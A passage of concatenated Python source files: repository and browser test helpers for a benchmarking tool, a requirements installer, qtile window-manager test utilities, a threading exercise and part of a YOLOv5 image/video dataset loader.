with io.open(join(self.path, '.hg', 'hgrc'), 'w', encoding="utf-8") as fd:
fd.write(_hg_config)
self._repo = hglib.open(self.path.encode(sys.getfilesystemencoding()),
encoding=self.encoding)
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
date = "{0} 0".format(util.datetime_to_timestamp(date))
self._repo.commit(message.encode(self.encoding),
date=date.encode(self.encoding))
def tag(self, number):
self._fake_date += datetime.timedelta(seconds=1)
date = "{0} 0".format(util.datetime_to_timestamp(self._fake_date))
self._repo.tag(
['tag{0}'.format(number).encode(self.encoding)],
message="Tag {0}".format(number).encode(self.encoding),
date=date.encode(self.encoding))
def add(self, filename):
self._repo.add([filename.encode(sys.getfilesystemencoding())])
def checkout(self, branch_name, start_commit=None):
if start_commit is not None:
self._repo.update(start_commit.encode(self.encoding))
self._repo.branch(branch_name.encode(self.encoding))
else:
self._repo.update(branch_name.encode(self.encoding))
def merge(self, branch_name, commit_message=None):
self._repo.merge(branch_name.encode(self.encoding),
tool=b"internal:other")
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
log = self._repo.log(name.encode(self.encoding), limit=1)
if log:
return log[0][1].decode(self.encoding)
return None
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "default"
log = self._repo.log('sort(ancestors({0}), -rev)'.format(branch).encode(self.encoding))
return [entry[1].decode(self.encoding) for entry in log]
def get_commit_message(self, commit_hash):
return self._repo.log(commit_hash.encode(self.encoding))[0].desc.decode(self.encoding)
def copy_template(src, dst, dvcs, values):
for root, dirs, files in os.walk(src):
for dir in dirs:
src_path = join(root, dir)
dst_path = join(dst, relpath(src_path, src))
if not isdir(dst_path):
os.makedirs(dst_path)
for file in files:
src_path = join(root, file)
dst_path = join(dst, relpath(src_path, src))
try:
with io.open(src_path, 'r', encoding='utf-8') as fd:
content = fd.read()
except UnicodeDecodeError:
# File is some sort of binary file... just copy it
# directly with no template substitution
with io.open(src_path, 'rb') as fd:
content = fd.read()
with io.open(dst_path, 'wb') as fd:
fd.write(content)
else:
content = content.format(**values)
with io.open(dst_path, 'w', encoding='utf-8') as fd:
fd.write(content)
dvcs.add(dst_path)
def generate_test_repo(tmpdir, values=[0], dvcs_type='git',
extra_branches=(), subdir=''):
"""
Generate a test repository
Parameters
----------
tmpdir
Repository directory
values : list
List of values to substitute in the template
dvcs_type : {'git', 'hg'}
What dvcs to use
extra_branches : list of (start_commit, branch_name, values)
Additional branches to generate in the repository.
For branch start commits, use relative references, e.g.,
the format 'master~10' or 'default~10' works both for Hg
and Git.
subdir
A relative subdirectory inside the repository to copy the
test project into.
Returns
-------
dvcs : Git or Hg
"""
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
project_path = os.path.join(dvcs_path, subdir)
if not os.path.exists(project_path):
os.makedirs(project_path)
for i, value in enumerate(values):
mapping = {
'version': i,
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}".format(i))
dvcs.tag(i)
if extra_branches:
for start_commit, branch_name, values in extra_branches:
dvcs.checkout(branch_name, start_commit)
for i, value in enumerate(values):
mapping = {
'version': "{0}".format(i),
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}.{1}".format(branch_name, i))
return dvcs
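# Hedged usage sketch (added for illustration, not in the original file): a typical
# call from a test. 'tmpdir' is assumed to be a pytest-provided temporary directory;
# the branch start commit uses the relative syntax described in the docstring above.
def _example_generate_test_repo(tmpdir):
    dvcs = generate_test_repo(str(tmpdir), values=[1, 2, 3], dvcs_type='git',
                              extra_branches=[('master~1', 'feature', [4, 5])])
    return dvcs.get_branch_hashes('feature')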
def generate_repo_from_ops(tmpdir, dvcs_type, operations):
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
version = 0
for op in operations:
if op[0] == "commit":
copy_template(template_path, dvcs_path, dvcs, {
"version": version,
"dummy_value": op[1],
})
version += 1
dvcs.commit("Revision {0}".format(version), *op[2:])
elif op[0] == "checkout":
dvcs.checkout(*op[1:])
elif op[0] == "merge":
dvcs.merge(*op[1:])
else:
raise ValueError("Unknown dvcs operation {0}".format(op))
return dvcs
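# Hedged usage sketch (added for illustration): the operations list accepted above is
# a sequence of ("commit", value[, date]), ("checkout", branch[, start_commit]) and
# ("merge", branch[, message]) tuples applied in order. The example assumes the
# default git branch is named 'master', as in the other helpers in this file.
def _example_generate_repo_from_ops(tmpdir):
    return generate_repo_from_ops(str(tmpdir), 'git', [
        ("commit", 1),
        ("checkout", "feature", "master"),
        ("commit", 2),
        ("checkout", "master"),
        ("merge", "feature"),
    ])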
def generate_result_dir(tmpdir, dvcs, values, branches=None):
result_dir = join(tmpdir, "results")
os.makedirs(result_dir)
html_dir = join(tmpdir, "html")
machine_dir = join(result_dir, "tarzan")
os.makedirs(machine_dir)
if branches is None:
branches = [None]
conf = config.Config.from_json({
'results_dir': result_dir,
'html_dir': html_dir,
'repo': dvcs.path,
'project': 'asv',
'branches': branches or [None],
})
repo = get_repo(conf)
util.write_json(join(machine_dir, "machine.json"), {
'machine': 'tarzan',
'version': 1,
})
timestamp = datetime.datetime.utcnow()
benchmark_version = sha256(os.urandom(16)).hexdigest()
params = None
param_names = None
for commit, value in values.items():
if isinstance(value, dict):
params = value["params"]
result = Results({"machine": "tarzan"}, {}, commit,
repo.get_date_from_name(commit), "2.7", None)
value = {
'result': [value],
'params': [],
'started_at': timestamp,
'ended_at': timestamp,
'stats': None,
'samples': None,
'number': None,
}
result.add_result("time_func", value, benchmark_version)
result.save(result_dir)
if params:
param_names = ["param{}".format(k) for k in range(len(params))]
util.write_json(join(result_dir, "benchmarks.json"), {
"time_func": {
"name": "time_func",
"params": params or [],
"param_names": param_names or [],
"version": benchmark_version,
}
}, api_version=1)
return conf
@pytest.fixture(scope="session")
def browser(request, pytestconfig):
"""
Fixture for Selenium WebDriver browser interface
"""
driver_str = pytestconfig.getoption('webdriver')
if driver_str == "None":
pytest.skip("No webdriver selected for tests (use --webdriver).")
# Evaluate the options
def FirefoxHeadless():
from selenium.webdriver.firefox.options import Options
options = Options()
options.add_argument("-headless")
return selenium.webdriver.Firefox(firefox_options=options)
def ChromeHeadless():
options = selenium.webdriver.ChromeOptions()
options.add_argument('headless')
return selenium.webdriver.Chrome(chrome_options=options)
ns = {}
six.exec_("import selenium.webdriver", ns)
six.exec_("from selenium.webdriver import *", ns)
ns['FirefoxHeadless'] = FirefoxHeadless
ns['ChromeHeadless'] = ChromeHeadless
create_driver = ns.get(driver_str, None)
if create_driver is None:
src = "def create_driver():\n"
src += textwrap.indent(driver_str, " ")
six.exec_(src, ns)
create_driver = ns['create_driver']
# Create the browser
browser = create_driver()
# Set timeouts
browser.set_page_load_timeout(10)
browser.set_script_timeout(10)
# Clean up on fixture finalization
def fin():
browser.quit()
request.addfinalizer(fin)
# Set default time to wait for AJAX requests to complete
browser.implicitly_wait(5)
return browser
@contextmanager
def preview(base_path):
"""
Context manager for ASV preview web server. Gives the base URL to use.
Parameters
----------
base_path : str
Path to serve files from
"""
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
# Don't serve from cwd, but from a different directory
path = SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, path)
path = os.path.join(base_path, os.path.relpath(path, os.getcwd()))
return util.long_path(path)
httpd, base_url = create_httpd(Handler)
def run():
try:
httpd.serve_forever()
except:
import traceback
traceback.print_exc()
return
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
try:
yield base_url
finally:
# Stop must be run in a separate thread, because
# httpd.shutdown blocks until serve_forever returns. We don't
# want to block here --- it appears in some environments
# problems shutting down the server may arise.
stopper = threading.Thread(target=httpd.shutdown)
stopper.daemon = True
stopper.start()
stopper.join(5.0)
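# Hedged usage sketch (added for illustration): serving a directory of built HTML and
# fetching a page from it with the retry helper defined just below; 'browser' is the
# Selenium fixture from above and 'html_dir' is any directory of generated output.
def _example_preview(browser, html_dir):
    with preview(html_dir) as base_url:
        get_with_retry(browser, base_url + '/index.html')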
def get_with_retry(browser, url):
for j in range(2):
try:
return browser.get(url)
except TimeoutException:
time.sleep(2)
return browser.get(url)
|
install.py
|
# Date: 01/09/2019
# Author: Mohamed
# Description: Install file
from time import sleep
from queue import Queue
from os.path import exists
from subprocess import Popen
from threading import Thread, RLock
class Install:
def __init__(self, path_to_req):
self.lock = RLock()
self.is_alive = True
self.is_reading = True
self.is_installing = False
self.requirements = Queue()
self.path_to_req = path_to_req
@property
def path_exists(self):
return exists(self.path_to_req)
def read_file(self):
with open(self.path_to_req, mode='rt') as file:
for line in file:
if line:
with self.lock:
self.requirements.put(line.replace('\n', ''))
self.is_reading = False
def install(self, name):
print('[+] Installing {} ...'.format(name))
cmd = 'pip install {}'.format(name)
cmd = cmd.split()
try:
self.is_installing = True
Popen(cmd).wait()
except:
print('[!] Failed to install {}'.format(name))
finally:
print('\n')
self.is_installing = False
def install_all(self):
while self.is_alive:
while self.requirements.qsize():
with self.lock:
name = self.requirements.get()
self.install(name)
def start_primary_threads(self):
read_thread = Thread(target=self.read_file)
install_all_thread = Thread(target=self.install_all)
read_thread.daemon = True
install_all_thread.daemon = True
read_thread.start()
install_all_thread.start()
def start(self):
if self.path_exists:
self.start_primary_threads()
while self.is_alive:
try:
if not self.is_reading and not self.requirements.qsize() and not self.is_installing:
self.stop()
sleep(0.5)
except KeyboardInterrupt:
self.stop()
else:
print('[*] Unable to locate the file requirements.txt')
def stop(self):
self.is_alive = False
if __name__ == '__main__':
path_to_req = 'requirements.txt'
install = Install(path_to_req)
install.start()
|
test_process_3.py
|
##########################################################################
# Testing of python process
##########################################################################
import logging
from queue import Empty
from multiprocessing import Queue, Process, Event, Lock
# Loop until stop
def loop(queue, stop, lock, logger):
    """ run the process until the stop event is set """
    while not stop.is_set():
        # Take data from the queue; use a timeout so the stop event is re-checked
        # instead of blocking forever on an empty queue (which would hang join())
        try:
            data = queue.get(block=True, timeout=0.25)
        except Empty:
            continue
        # Do something with data
        # ...
        # Report
        lock.acquire()
        print("Done Something")
        logger.log(logging.INFO, 'Done something')
        lock.release()
if __name__ == '__main__':
logger = logging.getLogger("Tester")
# Threading Locks, Events
stop = Event()
lock = Lock()
stop.clear()
# Setting up queue
queue = Queue(maxsize=32)
print("Setting up Process")
process=Process(target=loop, args=(queue, stop, lock, logger, ))
process.daemon = True
process.start()
print("Provide data to Process queue")
data = [0,1,2,3,4,5,6,7]
if not queue.full():
queue.put(data, block=False)
# Finish
print("Cleaning up")
stop.set()
process.join()
process.close()
queue.close()
|
utils.py
|
# Copyright (c) 2011 Florian Mounier
# Copyright (c) 2011 Anshuman Bhaduri
# Copyright (c) 2014 Sean Vig
# Copyright (c) 2014-2015 Tycho Andersen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import libqtile
import libqtile.ipc
from libqtile.manager import Qtile
from libqtile.log_utils import init_log
import logging
import multiprocessing
import os
import shutil
import subprocess
import sys
import tempfile
import time
import traceback
import xcffib
import xcffib.xproto
from nose.tools import with_setup, assert_raises
from nose.plugins.attrib import attr
from functools import wraps
WIDTH = 800
HEIGHT = 600
SECOND_WIDTH = 640
SECOND_HEIGHT = 480
def _find_display():
"""
Returns the next available display
"""
display = 1
while os.path.exists("/tmp/.X%s-lock" % display):
display += 1
return display
def whereis(program):
for path in os.environ.get('PATH', '').split(':'):
if os.path.exists(os.path.join(path, program)) and \
not os.path.isdir(os.path.join(path, program)):
return os.path.join(path, program)
return None
class Xephyr(object):
def __init__(self, xinerama, config, start_qtile=True,
randr=False, two_screens=True,
width=WIDTH, height=HEIGHT, xoffset=None):
self.xinerama, self.randr = xinerama, randr
self.config = config
self.start_qtile = start_qtile
self.two_screens = two_screens
self.width = width
self.height = height
if xoffset is None:
self.xoffset = width
else:
self.xoffset = xoffset
self.qtile = None # Handle to Qtile instance, multiprocessing.Process object
self.xephyr = None # Handle to Xephyr instance, subprocess.Popen object
self.display = ":{}".format(_find_display())
def __call__(self, function):
def teardown():
# Remove temporary files
if os.path.exists(self.tempdir):
shutil.rmtree(self.tempdir)
# Shutdown Xephyr
self._stopXephyr()
def setup():
# Setup socket and log files
self.tempdir = tempfile.mkdtemp()
self.sockfile = os.path.join(self.tempdir, 'qtile.sock')
self.logfile = os.path.join(self.tempdir, 'qtile.log')
self.testwindows = []
# Setup Xephyr
try:
self._startXephyr()
except AssertionError:
teardown()
raise
@attr('xephyr')
@with_setup(setup, teardown)
@wraps(function)
def wrapped_fun():
try:
if self.start_qtile:
self.startQtile(self.config)
return function(self)
finally:
if os.path.exists(self.logfile):
with open(self.logfile) as f:
log_output = f.read().strip()
if log_output:
print("------------------------ >> begin log file << ------------------------")
print(log_output)
print("------------------------- >> end log file << -------------------------")
else:
print("------------------------ >> log file empty << ------------------------")
# If we started qtile, we should be sure to take it down
if self.start_qtile:
self.stopQtile()
# If we didn't start qtile, make sure the user took it down if needed
if self.qtile and not self.start_qtile:
raise AssertionError("Stop qtile!")
return wrapped_fun
def _startXephyr(self, restart=True):
args = [
"Xephyr", "-name", "qtile_test",
self.display, "-ac",
"-screen", "%sx%s" % (self.width, self.height)]
if self.two_screens:
args.extend(["-origin", "%s,0" % self.xoffset, "-screen",
"%sx%s" % (SECOND_WIDTH, SECOND_HEIGHT)])
if self.xinerama:
args.extend(["+xinerama"])
if self.randr:
args.extend(["+extension", "RANDR"])
self.xephyr = subprocess.Popen(args,
stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
try:
self._waitForXephyr()
except AssertionError:
# We'll try to get a new display and try one more time...
if restart:
self.display = ":{}".format(_find_display())
self._startXephyr(restart=False)
else:
raise
def _stopXephyr(self):
assert self.xephyr is not None, "Xephyr must be started first"
# Complain if qtile or windows are running, but still kill xephyr
try:
assert self.qtile is None, "Kill Qtile before stopping Xephyr"
assert self.testwindows == [], "Kill all test windows before stopping Xephyr"
finally:
# Kill xephyr only if it is running
if self.xephyr.poll() is None:
self._kill(self.xephyr)
self.xephyr = None
def _waitForXephyr(self):
# Wait until Xephyr process dies
while self.xephyr.poll() is None:
try:
conn = xcffib.connect(self.display)
break
except xcffib.ConnectionException:
pass
time.sleep(0.1)
else:
(stdout_data, stderr_data) = self.xephyr.communicate()
raise AssertionError("Error launching Xephyr, quit with return code: {:d}\n"
"stderr: {}\n"
"stdout: {}".format(
self.xephyr.returncode,
stderr_data.decode(),
stdout_data.decode()
)
)
conn.disconnect()
del conn
def startQtile(self, config):
rpipe, wpipe = multiprocessing.Pipe()
def runQtile():
try:
init_log(logging.INFO, log_path=self.logfile, log_color=False)
q = Qtile(config, self.display, self.sockfile)
q.loop()
except Exception:
wpipe.send(traceback.format_exc())
with open(self.logfile, 'a') as f:
f.write("--------------------- >> begin qtile traceback << --------------------")
f.write(traceback.format_exc())
f.write("-------------------- >> begin qtile traceback << ---------------------")
self.qtile = multiprocessing.Process(target=runQtile)
self.qtile.start()
self._waitForQtile(rpipe)
def stopQtile(self):
assert self.qtile is not None, "Qtile must be started first"
self.qtile.terminate()
self.qtile.join(10)
if self.qtile.is_alive():
# desperate times... this probably messes with multiprocessing...
try:
os.kill(self.qtile.pid, 9)
os.waitpid(self.qtile.pid, 0)
except OSError:
# The process may have died due to some other error
pass
if self.qtile.exitcode:
print("Qtile exited with exitcode: %d" % self.qtile.exitcode)
self.qtile = None
# Kill all the windows
for proc in self.testwindows[:]:
self._kill(proc)
def _waitForQtile(self, errpipe):
# First, wait for socket to appear
start = time.time()
while time.time() < start + 10:
if os.path.exists(self.sockfile):
break
if errpipe.poll(0.1):
error = errpipe.recv()
raise AssertionError("Error launching Qtile, traceback:\n%s" % error)
else:
raise AssertionError("Error launching Qtile, socket never came up")
self.c = libqtile.command.Client(self.sockfile)
# Next, wait for server to come up
start = time.time()
while time.time() < start + 10:
try:
if self.c.status() == "OK":
break
except libqtile.ipc.IPCError:
pass
if errpipe.poll(0.1):
error = errpipe.recv()
raise AssertionError("Error launching Qtile, traceback:\n%s" % error)
else:
raise AssertionError("Error launching Qtile, quit without exception")
def _testProc(self, args):
if not args:
raise AssertionError("Trying to run nothing! (missing arguments)")
start = len(self.c.windows())
proc = subprocess.Popen(args, env={"DISPLAY": self.display})
while proc.poll() is None:
try:
if len(self.c.windows()) > start:
break
except RuntimeError:
pass
time.sleep(0.1)
else:
raise AssertionError("Window never appeared...")
self.testwindows.append(proc)
return proc
def groupconsistency(self):
groups = self.c.groups()
screens = self.c.screens()
seen = set()
for g in groups.values():
scrn = g["screen"]
if scrn is not None:
if scrn in seen:
raise AssertionError(
"Screen referenced from more than one group.")
seen.add(scrn)
assert screens[scrn]["group"] == g["name"]
assert len(seen) == len(screens), "Not all screens \
had an attached group."
def qtileRaises(self, exc, config):
assert_raises(exc, Qtile,
config, self.display, self.sockfile)
def testWindow(self, name):
python = sys.executable
d = os.path.dirname(os.path.realpath(__file__))
path = os.path.join(d, "scripts", "window.py")
return self._testProc(
[python, path, self.display, name]
)
def testXclock(self):
path = whereis("xclock")
return self._testProc(
[path]
)
def testXeyes(self):
path = whereis("xeyes")
return self._testProc(
[path]
)
def testGkrellm(self):
path = whereis("gkrellm")
return self._testProc(
[path]
)
def testXterm(self):
path = whereis("xterm")
return self._testProc(
[path]
)
def _kill(self, proc):
proc.kill()
proc.wait()
if proc in self.testwindows:
self.testwindows.remove(proc)
def kill(self, proc):
start = len(self.c.windows())
self._kill(proc)
for i in range(20):
if len(self.c.windows()) < start:
break
time.sleep(0.1)
else:
raise AssertionError("Window could not be killed...")
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python foo.py
from threading import Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
# TODO: increment i 1_000_000 times
for x in range(1000000):
i += 1
def decrementingFunction():
global i
# TODO: decrement i 1_000_000 times
for x in range(1000000):
i -= 1
def main():
# Note: nothing extra is needed to read i here; a 'global i' declaration is only required when assigning to it
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# TODO: Start both threads
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
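# Added note (not part of the original exercise): because "i += 1" and "i -= 1" are not
# atomic, the two threads interleave and the printed "magic number" is usually not 0.
# A hedged sketch of one fix is to guard the shared counter with a threading.Lock:
#
#   from threading import Lock
#   lock = Lock()
#   ...
#   with lock:
#       i += 1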
|
datasets.py
|
# Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from data.convert_data import xml2txt
from utils.general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, resample_segments, \
clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
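# Worked example (added note): a 4000x3000 photo whose EXIF Orientation tag is 6 or 8
# (rotated 270 or 90 degrees) is reported by exif_size() as (3000, 4000), i.e. width
# and height swapped; images without EXIF data fall through and keep img.size as-is.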
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP processes the dataset first, so that the following ones can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
# dataset_5 = dataset[0:5000]
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
p = str(Path(path).absolute()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
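# Hedged usage sketch (added for illustration): LoadImages is an iterator yielding
# (path, padded_rgb_image, original_bgr_image, video_capture) tuples, so a minimal
# inference loop looks roughly like this; 'model' is a placeholder for a loaded network.
def _example_loadimages_loop(model, source='data/images', img_size=640):
    for path, img, img0, cap in LoadImages(source, img_size=img_size):
        img = torch.from_numpy(img).float() / 255.0  # CHW uint8 array to a 0-1 float tensor
        pred = model(img.unsqueeze(0))  # add a batch dimension before the forward pass
        # ... post-process 'pred' against the original image 'img0' here ...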
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
success, im = cap.retrieve()
self.imgs[index] = im if success else self.imgs[index] * 0
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
# parent = Path(img_paths[0]).parent
# labels_path = img_paths[0].split("\\")[:-2]
# parent.stem = "labels"
# labels_path = parent
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
labels_path_txt = ['txt'.join(x.replace(sa, sb, 1).rsplit(x.split('.')[-1], 1)) for x in img_paths]
